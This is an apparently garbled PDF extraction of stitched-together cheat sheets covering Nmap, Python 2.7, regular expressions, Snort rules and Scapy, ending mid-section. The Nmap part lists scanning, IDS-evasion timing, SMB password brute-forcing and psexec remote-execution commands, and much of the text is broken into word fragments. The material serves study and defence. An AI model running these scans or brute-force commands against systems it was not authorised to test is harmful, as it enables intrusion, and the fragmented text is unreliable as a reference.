NMAP Professor Messer�’s Quick Reference Guide to
2331
Nm
ap
C
he
at
Sh
ee
t v
1.0
!
POCK
ET R
EFER
ENCE
GU
IDE
SA
NS
Inst
itute
ht
tp://
ww
w.s
ans.
org
Targ
et S
peci
ficat
ion
IPv4
add
ress
: 192.168.1.1
IPv6
add
ress
: AABB:CCDD::FF%eth0
Hos
t na
me:
www.target.tgt
IP a
ddre
ss r
ange
: 192.168.0-255.0-255
CID
R b
lock
: 192.168.0.0/16
Use
file
with
list
s of
tar
gets
: -iL <filename>
Targ
et P
orts
No
port
ran
ge s
peci
fied
scan
s 1,
000
mos
t po
pula
r po
rts
-F Sc
an 1
00 m
ost
popu
lar
port
s -p<port1>-<port2> Po
rt r
ange
-p<port1>,<port2>,... Po
rt L
ist
-pU:53,U:110,T20-445 M
ix T
CP a
nd U
DP
-r Sc
an li
near
ly (
do n
ot r
ando
miz
e po
rts)
--top-ports <n> Sc
an n
mos
t po
pula
r po
rts
-p-65535
Leav
ing
off
initi
al p
ort
in r
ange
mak
es
Nm
ap s
can
star
t at
por
t 1
-p0-
Leav
ing
off
end
port
in r
ange
mak
es
N
map
sca
n th
roug
h po
rt 6
5535
-p-
Sc
an p
orts
1-6
5535
Scrip
ting
Engi
ne
N
otab
le S
crip
ts
-sC
Run
def
ault
scrip
ts
--script=<ScriptName>|
<ScriptCategory>|<ScriptDir>...
Run
indi
vidu
al o
r gr
oups
of
scrip
ts
--script-args=<Name1=Value1,...>
U
se t
he li
st o
f sc
ript
argu
men
ts
--script-updatedb
Upd
ate
scrip
t da
taba
se
A fu
ll lis
t of
Nm
ap S
crip
ting
Engi
ne s
crip
ts is
av
aila
ble
at h
ttp:
//nm
ap.o
rg/n
sedo
c/
Som
e pa
rtic
ular
ly u
sefu
l scr
ipts
incl
ude:
dn
s-zo
ne-t
rans
fer:
Att
empt
s to
pul
l a z
one
file
(AXF
R)
from
a D
NS
serv
er.
$ nmap --script dns-zone-
transfer.nse --script-args dns-zone-
transfer.domain=<domain> -p53
<hosts>
http
-rob
ots.
txt:
Har
vest
s ro
bots
.txt
file
s fr
om
disc
over
ed w
eb s
erve
rs.
$ nmap --script http-robots.txt
<hosts>
smb-
brut
e: A
ttem
pts
to d
eter
min
e va
lid
user
nam
e an
d pa
ssw
ord
com
bina
tions
via
au
tom
ated
gue
ssin
g.
$ nmap --script smb-brute.nse -p445
<hosts>
smb-
psex
ec:
Atte
mpt
s to
run
a s
erie
s of
pr
ogra
ms
on t
he t
arge
t m
achi
ne, us
ing
cred
entia
ls p
rovi
ded
as s
crip
targ
s.
$ nmap --script smb-psexec.nse –
script-args=smbuser=<username>,
smbpass=<password>[,config=<config>]
-p445 <hosts>
Nm
ap's
scr
ipt
cate
gorie
s in
clud
e, b
ut a
re n
ot li
mite
d to
, th
e fo
llow
ing:
a
uth
: U
tiliz
e cr
eden
tials
or
bypa
ss a
uthe
ntic
atio
n on
tar
get
host
s.
bro
ad
cast
: D
isco
ver
host
s no
t in
clud
ed o
n co
mm
and
line
by
broa
dcas
ting
on lo
cal n
etw
ork.
b
rute
: Att
empt
to
gues
s pa
ssw
ords
on
targ
et s
yste
ms,
for
a
varie
ty o
f pr
otoc
ols,
incl
udin
g ht
tp, SN
MP,
IAX,
MyS
QL,
VN
C,
etc.
d
efa
ult
: Sc
ripts
run
aut
omat
ical
ly w
hen
-sC o
r -A
are
use
d.
dis
cove
ry:
Try
to le
arn
mor
e in
form
atio
n ab
out
targ
et h
osts
th
roug
h pu
blic
sou
rces
of
info
rmat
ion,
SN
MP,
dire
ctor
y se
rvic
es,
and
mor
e.
do
s: M
ay c
ause
den
ial o
f se
rvic
e co
nditi
ons
in t
arge
t ho
sts.
ex
plo
it:
Att
empt
to
expl
oit
targ
et s
yste
ms.
ex
tern
al:
Int
erac
t w
ith t
hird
-par
ty s
yste
ms
not
incl
uded
in
targ
et li
st.
fuzz
er:
Send
une
xpec
ted
inpu
t in
net
wor
k pr
otoc
ol f
ield
s.
intr
usi
ve:
May
cra
sh t
arge
t, c
onsu
me
exce
ssiv
e re
sour
ces,
or
othe
rwis
e im
pact
tar
get
mac
hine
s in
a m
alic
ious
fas
hion
. m
alw
are
: Lo
ok f
or s
igns
of
mal
war
e in
fect
ion
on t
he t
arge
t ho
sts.
sa
fe:
Des
igne
d no
t to
impa
ct t
arge
t in
a n
egat
ive
fash
ion.
ve
rsio
n:
Mea
sure
the
ver
sion
of
soft
war
e or
pro
toco
l spo
ken
by t
arge
t ho
sts.
vu
l: M
easu
re w
heth
er t
arge
t sy
stem
s ha
ve a
kno
wn
vuln
erab
ility
.
Scrip
t Cat
egor
ies
: :
Bas
e Sy
ntax
# nmap [ScanType] [Options] {targets}
24 32
-sP
Pr
obe
only
(hos
t dis
cove
ry, n
ot p
ort s
can)
-sS
SY
N S
can
-sT
TC
P C
onne
ct S
can
-sU
U
DP S
can
-sV
Ve
rsio
n Sc
an
-O
O
S De
tect
ion
--scanflags
Se
t cus
tom
list
of T
CP u
sing
URG
ACKP
SHRS
TSYN
FIN
in a
ny o
rder
Prob
ing
Opt
ions
-Pn
Do
n't p
robe
(ass
ume
all h
osts
are
up)
-PB
De
faul
t pro
be (T
CP 8
0, 4
45 &
ICM
P)
-PS<portlist>
Chec
k w
heth
er ta
rget
s ar
e up
by
prob
ing
TCP
ports
-PE
U
se IC
MP
Echo
Req
uest
-PP
U
se IC
MP
Tim
esta
mp
Requ
est
-PM
U
se IC
MP
Net
mas
k Re
ques
t
Scan
Typ
es
Fine
-Gra
ined
Tim
ing
Opt
ions
--min-hostgroup/max-hostgroup <size>
Pa
ralle
l hos
t sca
n gr
oup
size
s --min-parallelism/max-parallelism
<numprobes>
Pr
obe
para
lleliz
atio
n --min-rtt-timeout/max-rtt-
timeout/initial-rtt-timeout <time>
Sp
ecifi
es p
robe
roun
d tri
p tim
e.
--max-retries <tries>
C
aps
num
ber o
f por
t sca
n pr
obe
retra
nsm
issi
ons.
--host-timeout <time>
G
ive
up o
n ta
rget
afte
r thi
s lo
ng
--scan-delay/--max-scan-delay <time>
Adj
ust d
elay
bet
wee
n pr
obes
--min-rate <number>
Se
nd p
acke
ts n
o sl
ower
than
<n
umbe
r> p
er s
econ
d --max-rate <number>
Se
nd p
acke
ts n
o fa
ster
than
<n
umbe
r> p
er s
econ
d
Agg
rega
te T
imin
g O
ptio
ns
-T0
Para
noid
: Ve
ry s
low
, us
ed f
or I
DS
evas
ion
-T1
Snea
ky:
Qui
te s
low
, us
ed f
or I
DS
evas
ion
-T2
Polit
e: S
low
s do
wn
to c
onsu
me
less
b
andw
idth
, ru
ns ~
10 t
imes
slo
wer
tha
n
def
ault
-T3
Nor
mal
: D
efau
lt, a
dyn
amic
tim
ing
mod
el
bas
ed o
n ta
rget
res
pons
iven
ess
-T4
Aggr
essi
ve:
Assu
mes
a f
ast
and
relia
ble
net
wor
k an
d m
ay o
verw
helm
tar
gets
-T5
Insa
ne:
Very
agg
ress
ive;
will
like
ly
ove
rwhe
lm t
arge
ts o
r m
iss
open
por
ts
Out
put F
orm
ats
-oN
Stan
dard
Nm
ap o
utpu
t -oG
Gre
ppab
le f
orm
at
-oX
XML
form
at
-oA
<basename>
Gen
erat
e N
map
, G
repp
able
, an
d XM
L ou
tput
file
s us
ing
base
nam
e fo
r fil
es
Mis
c O
ptio
ns
-n
Dis
able
rev
erse
IP
addr
ess
look
ups
-6
Use
IPv
6 on
ly
-A
Use
sev
eral
fea
ture
s, in
clud
ing
OS
Det
ectio
n, V
ersi
on D
etec
tion,
Scr
ipt
Scan
ning
(de
faul
t), an
d tr
acer
oute
--reason
Dis
play
rea
son
Nm
ap t
hink
s po
rt is
op
en, cl
osed
, or
filt
ered
25 33
Python
2.7 Quick Referen
ce She
et
ver 2.01
110105 (sjd)
Interactive Help in Pytho
n Shell
help()
Invoke interactive help
help(m
) Display help for m
odule m
help(f)
Display help for fun
ction f
dir(m)
Display nam
es in m
odule m
Small O
perator Preced
ence Tab
le
func_name(args, )
Functio
n call
x[index : index]
Slicing
x[index]
Inde
x.attribute
Attribu
te re
ference
**
Expo
nentiatio
n *, /, %
Multip
ly, divide, mod
+, -‐
Add
, sub
tract
>, <, <=, >=, !=
, ==
Comparison
in, not in
Mem
bership tests
not, and
, or
Boolean op
erators
NOT, AND, O
R
Mod
ule Im
port
impo
rt m
odule_name
from
module_name im
port name ,
from
module_name im
port *
Common
Data Type
s Type
Description
Literal Ex
int
long
float
complex
bool
str
tuple
list
dict
32-‐bit Integer
Integer > 32 bits
Floatin
g po
int n
umbe
r Co
mplex num
ber
Boolean
Character seq
uence
Immutable seq
uence
Mutable seq
uence
Mapping
3, -‐4
101L
3.0, -‐6
.55
1.2J
True
, False
Python
(2, 4, 7)
[2, x, 3.1]
{ x:2, y:5 }
Common
Syntax Structures
Assignm
ent Statem
ent
var = exp
Console Inpu
t/Outpu
t var = inpu
t( [p
rompt] )
var = raw_inp
ut( [prompt] )
print e
xp[,]
Selection
if (boolean_exp):
stm
t
[elif (b
oolean_exp):
stm
t ]
[else:
stm
t ]
Repe
tition
while (b
oolean_exp):
stm
t
Traversal
for var in traversable_object:
stm
t
Function
Definition
def function_name( parm
ameters ):
stm
t
Function
Call
function_name( argum
ents )
Class Definition
class Class_name [ (super_class) ]:
[ class variables ]
def m
ethod_name( self, parameters ):
stm
t
Object Instantiation
obj_ref =
Class_name( argum
ents )
Metho
d Invocation
obj_ref.method_name( arguments )
Exception Han
dling
try:
stm
t
except [exception_type] [, var]:
stm
t
Common
Built-‐in
Fun
ctions
Function
Re
turns
abs(x)
Absolute value of x
dict()
Empty dictionary, eg: d = dict()
float(x)
int o
r string x as float
id(obj)
mem
ory addr of o
bj
int (x)
float or string x as int
len(s)
Num
ber o
f items in seq
uence s
list()
Empty list, eg: m
= list()
max(s)
Maxim
um value of items in s
min(s)
Minim
um value
of items in s
open
(f)
Ope
n filen
ame f for inpu
t ord(c)
ASCII code
of c
pow(x,y)
x ** y
range(x)
A list of x ints 0 to
x -‐ 1
roun
d(x,n)
float x ro
unde
d to n places
str(obj)
str represen
tatio
n of obj
sum(s)
Sum of n
umeric seq
uence s
tuple(item
s) tuple of item
s type
(obj)
Data type of o
bj
Common
Math Mod
ule Function
s
Function
Re
turns (all flo
at)
ceil(x)
Smallest who
le nbr >= x
cos(x)
Cosine
of x radians
degrees(x)
x radians in degrees
radians(x)
x de
grees in radians
exp(x)
e ** x
floor(x)
Largest w
hole nbr <= x
hypo
t(x, y)
sqrt(x * x + y * y)
log(x [, base])
Log of x to
base or n
atural log if
base not given
pow(x, y)
x ** y
sin(x)
Sine
of x radians
sqrt(x)
Positive square roo
t of x
tan(x)
Tangen
t of x ra
dians
pi
Math constant pi to 15
sig figs
e Math constant e to
15 sig figs
2634
Common
String Metho
ds
S.metho
d()
Returns (str unless no
ted)
capitalize
S with
first char up
percase
center(w)
S centered
in str w chars wide
coun
t(sub)
int n
br of n
on-‐overlapping
occurren
ces of sub in S
find(sub)
int ind
ex of first occurrence of
sub in S or -‐1 if not fo
und
isdigit()
bool True if S is all digit chars,
False othe
rwise
islower()
isup
per()
bool True if S is all lower/upp
er
case chars, False otherwise
join(seq)
All ite
ms in seq con
catenated
into a str, delim
ited by S
lower()
uppe
r()
Lower/upp
er case copy of S
lstrip()
rstrip()
Copy of S with
leading/ trailing
whitespace removed
, or bo
th
split([sep])
List of token
s in S, delim
ited by
sep; if sep not given
, delim
iter
is any whitespace
Form
atting N
umbe
rs as Strings
Syntax:
form
at_spec
% numeric_exp
form
at_spec syntax: %
width.precision type
width (o
ptional): align in num
ber o
f colum
s specified
; negative to left-‐align, precede
with
0 to zero-‐fill
precision (o
ptional): sho
w spe
cifie
d digits of
precision for flo
ats; 6 is default
type (req
uired): d
(decim
al int), f (float), s
(string), e (float expon
entia
l notation)
Examples fo
r x = 123, y = 456
.789
% x -‐>
. . . 123
% x -‐>
000123
%8.2f % y -‐>
. . 456
.79
-‐> 4.57e+02
-‐8s
-‐> Hello . . .
Common
List Metho
ds
L.metho
d()
Result/Returns
appe
nd(obj)
App
end obj to en
d of L
coun
t(obj)
Returns int n
br of o
ccurrences of
obj in L
inde
x(obj)
Returns inde
x of first o
ccurrence
of obj in L; ra
ises Value
Error if
obj not in L
pop([in
dex])
Returns ite
m at spe
cifie
d index
or item
at e
nd of L if index not
given; raises IndexError if L is
empty or index is out of range
remove(obj)
Removes first o
ccurrence of obj
from
L; raises Va
lueError if obj is
not in L
reverse()
Reverses L in place
sort()
Sorts L in place
Common
Tup
le M
etho
ds
T.metho
d()
Returns
coun
t(obj)
Returns nb
r of o
ccurrences of
obj in T
inde
x(obj)
Returns inde
x of first o
ccurrence
of obj in T; raises Va
lueError if
obj is no
t in T
Common
Diction
ary Metho
ds
D.m
etho
d()
Result/Returns
clear()
Remove all items from
D
get(k [,val])
Return D[k] if k in D, else val
has_key(k)
Return True if k in D, else False
items()
Return list of key-‐value pairs in
D; each list item
is 2-‐item
tuple
keys()
Return list of D
po
p(k, [val])
Remove key k, return mappe
d value or val if k not in D
values()
Return list of D
s values
Common
File M
etho
ds
F.metho
d()
Result/Returns
read([n])
Return str of n
ext n
chars from
F,
or up to EOF if n not given
readline([n]) Re
turn str up to next n
ewline, or
at m
ost n
chars if spe
cifie
d readlines()
Return list of all lines in F, w
here
each item
is a line
write(s)
Write str s to
F
writelines(L)
Write all str in seq
L to
F
close()
Closes th
e file
Other Syntax
Hold windo
w fo
r user keystroke to close:
raw_inp
ut(Press <Enter> to
quit.)
Preven
t execution on
impo
rt:
m
ain()
Displayab
le ASCII Ch
aracters
32 SP 48 0
64 @ 80 P
96
` 112
p 33 !
49 1
65 A 81 Q 97 a
113
q 34
50 2
66 B
82 R
98 b
114
r 35 #
51 3
67 C
83 S
99 c
115
s 36 $
52 4
68 D 84 T
100
d 116
t 37 % 53 5
69 E
85 U 101
e 117
u 38 & 54 6
70 F
86 V
102
f 118
v 39
55 7
71 G 87 W 103 g
119
w
40 (
56 8
72 H 88 X
104
h 120
x 41 )
57 9
73 I
89 Y
105
i 121
y 42 *
58 :
74 J
90 Z
105
j 122
z 43 +
59 ;
75 K
91 [
107
k 123
{ 44 ,
60 <
76 L
92 \
108
l 124
| 45 -‐
61 =
77 M 93 ]
109
m 1
25 }
46
. 62
> 78 N 94
^ 110
n 126
~ 47
/ 63
? 79 O 95
_ 111
o 127 DEL
\\
\n = 10
2735
Regular Expressions (Regex) Cheat Sheet
Special Characters in Regular Expressions & their meanings
Character Meaning Example
* Match zero, one or more of the previous
Ah* matches "Ahhhhh" or "A"
? Match zero or one of the previous
Ah? matches "Al" or "Ah"
+ Match one or more of the
previous
Ah+ matches "Ah" or "Ahhh" but not
"A"
\ Used to escape a special character
Hungry\? matches "Hungry?"
. Wildcard character,
matches any character
do.* matches "dog", "door", "dot",
etc.
( ) Group characters See example for |
[ ] Matches a range of characters
[cbf]ar matches "car", "bar", or
"far"
[0-9]+ matches any positive
integer
[a-zA-Z] matches ascii letters a-z
(uppercase and lower case)
[^0-9] matches any character not
0-9.
| Matche previous OR next
character/group
(Mon)|(Tues)day matches
"Monday" or "Tuesday"
{ } Matches a specified number of
occurrences of the previous
[0-9]{3} matches "315" but not
"31"
[0-9]{2,4} matches "12", "123",
and "1234"
[0-9]{2,} matches "1234567..."
^ Beginning of a string. Or within
a character range [] negation.
^http matches strings that begin
with http, such as a url.
[^0-9] matches any character not
0-9.
$ End of a string. ing$ matches "exciting" but not
"ingenious"
2836
Python 2.7 RegularExpressions
Non-special chars match themselves. Exceptions arespecial characters:
\ Escape special char or start a sequence.. Match any char except newline, see re.DOTALL^ Match start of the string, see re.MULTILINE$ Match end of the string, see re.MULTILINE[] Enclose a set of matchable charsR|S Match either regex R or regex S.() Create capture group, & indicate precedence
After '[', enclose a set, the only special chars are:
] End the set, if not the 1st char- A range, eg. a-c matches a, b or c^ Negate the set only if it is the 1st char
Quantifiers (append '?' for non-greedy):
{m} Exactly m repetitions{m,n} From m (default 0) to n (default infinity)* 0 or more. Same as {,}+ 1 or more. Same as {1,}? 0 or 1. Same as {,1}
Special sequences:
\A Start of string\b Match empty string at word (\w+) boundary\B Match empty string not at word boundary\d Digit\D Non-digit\s Whitespace [ \t\n\r\f\v], see LOCALE,UNICODE\S Non-whitespace\w Alphanumeric: [0-9a-zA-Z_], see LOCALE\W Non-alphanumeric\Z End of string\g<id> Match prev named or numbered group, '<' & '>' are literal, e.g. \g<0> or \g<name> (not \g0 or \gname)
Special character escapes are much like those alreadyescaped in Python string literals. Hence regex '\n' issame as regex '\\n':
\a ASCII Bell (BEL)\f ASCII Formfeed\n ASCII Linefeed\r ASCII Carriage return\t ASCII Tab\v ASCII Vertical tab\\ A single backslash\xHH Two digit hexadecimal character goes here\OOO Three digit octal char (or just use an initial zero, e.g. \0, \09)\DD Decimal number 1 to 99, match previous numbered group
Extensions. Do not cause grouping, except 'P<name>':
(?iLmsux) Match empty string, sets re.X flags(?:...) Non-capturing version of regular parens(?P<name>...) Create a named capturing group.(?P=name) Match whatever matched prev named group(?#...) A comment; ignored.(?=...) Lookahead assertion, match without consuming(?!...) Negative lookahead assertion(?<=...) Lookbehind assertion, match if preceded(?<!...) Negative lookbehind assertion(?(id)y|n) Match 'y' if group 'id' matched, else 'n'
Flags for re.compile(), etc. Combine with '|':
re.I == re.IGNORECASE Ignore casere.L == re.LOCALE Make \w, \b, and \s locale dependentre.M == re.MULTILINE Multilinere.S == re.DOTALL Dot matches all (including newline)re.U == re.UNICODE Make \w, \b, \d, and \s unicode dependentre.X == re.VERBOSE Verbose (unescaped whitespace in pattern is ignored, and '#' marks comment lines)
Module level functions:
compile(pattern[, flags]) -> RegexObjectmatch(pattern, string[, flags]) -> MatchObjectsearch(pattner, string[, flags]) -> MatchObjectfindall(pattern, string[, flags]) -> list of stringsfinditer(pattern, string[, flags]) -> iter of MatchObjectssplit(pattern, string[, maxsplit, flags]) -> list of stringssub(pattern, repl, string[, count, flags]) -> stringsubn(pattern, repl, string[, count, flags]) -> (string, int)escape(string) -> stringpurge() # the re cache
RegexObjects (returned from compile()):
.match(string[, pos, endpos]) -> MatchObject
.search(string[, pos, endpos]) -> MatchObject
.findall(string[, pos, endpos]) -> list of strings
.finditer(string[, pos, endpos]) -> iter of MatchObjects
.split(string[, maxsplit]) -> list of strings
.sub(repl, string[, count]) -> string
.subn(repl, string[, count]) -> (string, int)
.flags # int, Passed to compile()
.groups # int, Number of capturing groups
.groupindex # {}, Maps group names to ints
.pattern # string, Passed to compile()
MatchObjects (returned from match() and search()):
.expand(template) -> string, Backslash & group expansion
.group([group1...]) -> string or tuple of strings, 1 per arg
.groups([default]) -> tuple of all groups, non-matching=default
.groupdict([default]) -> {}, Named groups, non-matching=default
.start([group]) -> int, Start/end of substring match by group
.end([group]) -> int, Group defaults to 0, the whole match
.span([group]) -> tuple (match.start(group), match.end(group))
.pos int, Passed to search() or match()
.endpos int, "
.lastindex int, Index of last matched capturing group
.lastgroup string, Name of last matched capturing group
.re regex, As passed to search() or match()
.string string, "
Gleaned from the python 2.7 're' docs.http://docs.python.org/library/re.html
https://github.com/tartley/python-regex-cheatsheetVersion: v0.3.3
37
Action Function
alert alerts and logs event
log logs event
pass ignores event
drop drops packet and logs event
reject TCP reset of session or ICMP Type3 Code 3 of UDP traffic and logs
sdrop drops packet without logging
activate drops packet without logging
dynamic alerts and activates a dynamic rule
Source/Destination Port Meaning
A.B.C.D Single IPA
A.B.C.D/XX CIDR
[A.B.C.D, A.B.C.E, A.B.C.G] Match ANY, not all
Proto
IP (covers all)
TCP
UDP
ICMP
Direction Meaning
-> from SRC to DEST
<> in either direction
Header Format
Action Proto SRC SRC Port Direction DST DST Port
Modifier Function
nocase; makes previous content match case insensitive, should be used in most cases to allow for vendor implementation variations. Should NOT be used when trying to match Base64 or URL encoding.
rawbytes; ignores pre--processor interpretation of payload contents and looks for a raw packet payload match
offset: advances pointer to after a number of bytes from the beginning of the PAYLOAD. Example offset:3;
depth: will only look for the content match from the beginning of the PAYLOAD up to the specified byte number.
distance: advances the pointer to after the number of bytes from the end of the last CONTENT MATCH Example distance:12;
within: will only look for the content match from the end of the last CONTENT MATCH through the specified number of bytes
SNORT RULE CHEAT SHEET
Created by Dave Werden
Format of Snort rules: header (body;)
Example:
alert udp 10.10.10.10 any -> 10.10.10.11 53 (msg:”We got the DNS traffic”; content:”|07|foundit|03|com”; nocase; reference, url:someintel.google.com;classtype: attempted_recon; sid:5000000; rev:1;)
2/8/2013 1
3038
Operator Options
msg: ascii text to be printed in alert or log, must be in quotes eg msg:”Yet another Scan”;
reference: will call a link to specific documentation of rules included in snort rule set (100--999,999) example using a CVE as a reference:cve,CVE--1999--0105; an example for url reference:url,someintel.google.com
sid: Snort ID number, <100 reserved, 100--‐1000000 (now 2000000) used for packaged rules, above that are custom
rev: revision of the snort rule (or set)
classtype: a named class of attack, built in ones are associated with a certain priority. Example classtype:attempted_recon;
priority: level of concern, 1 is really bad, 2 not so bad, 3 informational, etc.
content: searches the entire packet payload for either an ASCII string or a “binary” match.
isdataat: Verifies a certain number of bytes is present, can be made relative to previous content by adding relative to the end
uricontent: Same as content, but applies specifically to uri’s
urilen: Specifies a particular length of URI, or range of lengths. Requires HTTP Pre--processor
flow: describes state of session and directionality. Includes options: to_server from_server, to_client from_client only_stream no_stream stateless established
ipopts: indicates the presence of options fields in the IP header . Includes: eol-- End of List lsrr --Loose Source Routing rr –Record Route satid – Stream ID sec – Security ssrr – Strict Source Routing ts – Time Stamp
dsize: indicates a size, or size range of the entire packet (includes headers)
flags: indicates the presence of TCP Flags. Includes: A – Ack F – Fin P – Push Snort Cheat Sheet R – Reset S – Syn U – Urgent Data 0 – No Flags (used in nmap null scan) 1 – Reserved bit 1 (ECN) 2 – Reserved bit 2 (CWR) + -- Multiple Flags * -- Any Flag ! – Not that flag
ttl: specifies a particular time to live value in the IP header, some decimal number between 0-- 255.
tag: used to log a series of packets rather than just one. Think of it as a trigger. Tag largely replaces the activate: à? dynamic: pair. Parameters: session – logs all packets in the session that triggered the rule host – logs all packets to/from host who’s IP triggered the rule (this will capture all traffic, not just that particular session – good for capturing botnet activity) count – how much to log, a decimal number packets – logs that many packets seconds – logs all packets for the session or host for a specified number of seconds SRC – only logs packets from source DST – only logs packets from destination
Basic Body Options
Created by Dave Werden 2/8/2013 2
3139
snort
**Snort is an open source network intrusion detection system, capable of performing real‐time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content
searching/matching and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fin‐ gerprinting attempts, and much more. Snort
uses a flexible rules lan‐ guage to describe traffic that it should collect or pass, as well as a detection engine that utilizes a modular plugin architecture. Snort also has a modular real‐time alerting
capability, incorporating alerting and logging plugins for syslog, a ASCII text files, UNIX sockets or XML.
Expressions
decnet dst host True if the DECNET destination address is host decnet src hostTrue if the DECNET source address is host, which may be an address of the
form ``10
decnet host host True if either the DECNET source or destination address is host dst host hostTrue if the IP destination field of the packet is host, which may be either an
address or a name
dst net netTrue if the IP destination address of the packet has a network number of
netdst port port True if the packet is ip/tcp or ip/udp and has a destination port value of port
ether broadcast True if the packet is an ethernet broadcast packet ether broadcast True if the packet is an ethernet multicast packet
ether dst ehost True if the ethernet destination address is ehost ether host ehost True if either the ethernet source or destination addres is ehost
ether proto protocol True if the packet is of ether type protocol ether src ehost True if the ethernet source address is ehost
expr relop expr True if the relation holds, where relop is one of >, <, >=, <=, =, != gateway host True if the packet used host as a gateway
greater length True if the packet has a length greater than or equal to length host host True if either the IP source or destination of the packet is host
ip broadcast True if the packet is an IP broadcast packet ip multicast True if the packet is an IP multicast packet
ip proto protocol True if the packet is an ip packet (see ip(4P)) of protocol type protocol ip, arp, rarp, decnet Abbreviations for: ether proto p where p is one of the above protocols
lat, moprc, mopdl Abbreviations for: ether proto p where p is one of the above protocols less length True if the packet has a length less than or equal to length
net netTrue if either the IP source or destination address of the packet has a
network number of netnet net / ln True if the IP address matches net a netmask len bits wide
net net mask mask True if the IP address matches net with the specific net mask port port True if either the source or destination port of the packet is port
src host host True if the IP source field of the packet is host src net net True if the IP source address of the packet has a network number of net
src port port True if the packet has a source port value of port tcp, udp, icmp Abbreviations for: ip proto p where p is one of the above protocols
Options
‐? Show the program usage statement and exit ‐‐alert‐before‐pass Converts drop, sdrop, and reject rules into alert rules duringstartup
‐A alert‐mode Alert using the specified alert‐mode ‐b Log packets in a tcpdump(1) formatted file
‐B address‐conversion‐
mask
Convert all IP addresses in home‐net to addresses specified byaddress‐
conversion‐mask‐C Print the character data from the packet payload only (no hex)
‐c config‐file Use the rules located in file config‐file ‐‐conf‐error‐out Same as ‐x
‐‐create‐pidfile Create PID file, even when not in Daemon mode ‐‐cs‐dir <dir> Tell Snort to use control socket and create the socket in dir
‐D Run Snort in daemon mode ‐d Dump the application layer data when displaying packets in verbose or
packet logging mode
‐‐daq <type> Select packet acquisition module (default is pcap) ‐‐daq‐dir <dir> Tell Snort where to find desired DAQ
‐‐daq‐list [<dir>] List packet acquisition modules available in dir ‐‐daq‐mode <mode> Select the DAQ operating mode
‐‐daq‐var <name=value> Specify extra DAQ configuration variable‐‐dump‐dynamic‐rules
directoryLoad a dynamic preprocessor shared library specified by file
‐‐dynamic‐detection‐lib
fileLoad all dynamic detection rules shared libraries specified fromdirectory
‐‐dynamic‐detection‐lib‐
dir directoryCreate stub rule files from all loaded dynamic detection ruleslibraries
‐‐dynamic‐engine‐lib file Load all dynamic detection engine shared libraries specifiedfrom directory‐‐dynamic‐engine‐lib‐dir
directoryLoad a dynamic detection rules shared library specified by file
‐‐dynamic‐preprocessor‐
lib fileLoad all dynamic preprocessor shared libraries specified fromdirectory
‐‐dynamic‐preprocessor‐
lib‐dir directoryProcess alert, drop, sdrop, or reject before pass
‐E *WIN32 ONLY* Log alerts to the Windows Event Log ‐e Display/log the link layer packet headers
‐‐enable‐inline‐test Specify the path for Snort's PID file ‐‐exit‐check=countSignal termination after <count> callbacks from DAQ_Acquire(),showing the
time it takes from signaling until DAQ_Stop() iscalled
‐f Activate PCAP line buffering ‐F bpf‐file Read BPF filters from bpf‐file
‐G id Use id as a base event ID when logging events ‐g group Change the group/GID Snort runs under to group after initializa‐tion
‐H Force hash tables to be deterministic instead of using a randomnumber
generator for the seed & scale‐h home‐net Set the "home network" to home‐net
‐‐help Same as‐? Same as ‐V ‐I Print out the receiving interface name in alerts
‐i interface Sniff packets on interface ‐k checksum‐mode Tune the internal checksum verification functionality withalert‐mode
‐K logging‐mode Select a packet logging mode ‐L binary‐log‐file Set the filename of the binary log file to binary‐log‐file
‐l log‐dir Set the output logging directory to log‐dir ‐‐logid id Same as ‐G
‐M Log console messages to syslog when not running daemon mode ‐m umask Set the file mode creation mask to umask
‐N Turn off packet logging ‐n packet‐count Process packet‐count packets and exit
‐‐no‐interface‐pidfile Do not include the interface name in Snort PID file ‐‐nolock‐pidfile Do not try to lock Snort PID file
‐O Obfuscate the IP addresses when in ASCII packet dump mode ‐p Turn off promiscuous mode sniffing
‐P snap‐length Set the packet snaplen to snap‐length ‐‐pcap‐dir=directory A directory to recurse to look for pcaps
‐‐pcap‐file=file File that contains a list of pcaps to read ‐‐pcap‐filter=filter Shell style filter to apply when getting pcaps from file ordirectory
‐‐pcap‐list="list" A space separated list of pcaps to read ‐‐pcap‐no‐filter Reset to use no filter when getting pcaps from file or direc‐tory
‐‐pcap‐resetIf reading multiple pcaps, reset snort to post‐configurationstate before
reading next pcap‐‐pcap‐show Print a line saying what pcap is currently being read
‐‐pcap‐single=tcpdump‐
fileSame as ‐r
‐‐perfmon‐file
pathnameSame as ‐Z
‐‐pid‐path directory Specify the directory for the Snort PID file ‐‐process‐all‐events Enable Inline‐Test Mode Operation
‐Q Enable inline mode operation ‐q Quiet operation
‐R name Use name as a suffix to the snort pidfile ‐r tcpdump‐file Read the tcpdump‐formatted file tcpdump‐file
‐‐require‐rule‐sid Require an SID for every rule to be correctly threshold allrules ‐s Send alert messages to syslog
‐S variable=value Set variable name "variable" to value "value" ‐‐snaplen snap‐length Same as ‐P
‐T
Snort will start up in self‐test mode, checking all the supplied command line
switches and rules files that are handed to it andindicating that everything
is ready to proceed
‐t chroot Changes Snort's root directory to chroot after initialization 3240
41
42
packetlife.net
by Jeremy Stretch v1.0
SCAPY
Constructing Packets
# Setting protocol fields>>> ip=IP(src="10.0.0.1")>>> ip.dst="10.0.0.2"
# Combining layers>>> l3=IP()/TCP()>>> l2=Ether()/l3
# Splitting layers apart>>> l2.getlayer(1)<IP frag=0 proto=tcp |<TCP |>>>>> l2.getlayer(2)<TCP |>
Basic Commands
ls()List all available protocols and protocol options
lsc()List all available scapy command functions
confShow/set scapy configuration parameters
Specifying Addresses and Values
# Explicit IP address (use quotation marks)>>> IP(dst="192.0.2.1")
# DNS name to be resolved at time of transmission>>> IP(dst="example.com")
# IP network (results in a packet template)>>> IP(dst="192.0.2.0/24")
# Random addresses with RandIP() and RandMAC()>>> IP(dst=RandIP())>>> Ether(dst=RandMAC())
# Set a range of numbers to be used (template)>>> IP(ttl=(1,30))
# Random numbers with RandInt() and RandLong()>>> IP(id=RandInt())
Displaying Packets
# Show an entire packet>>> (Ether()/IPv6()).show()###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ffsrc= 00:00:00:00:00:00type= 0x86dd
###[ IPv6 ]###version= 6tc= 0fl= 0plen= Nonenh= No Next Headerhlim= 64src= ::1dst= ::1
# Show field types with default values>>> ls(UDP())sport : ShortEnumField = 1025 (53)dport : ShortEnumField = 53 (53)len : ShortField = None (None)chksum : XShortField = None (None)
Sending Packets
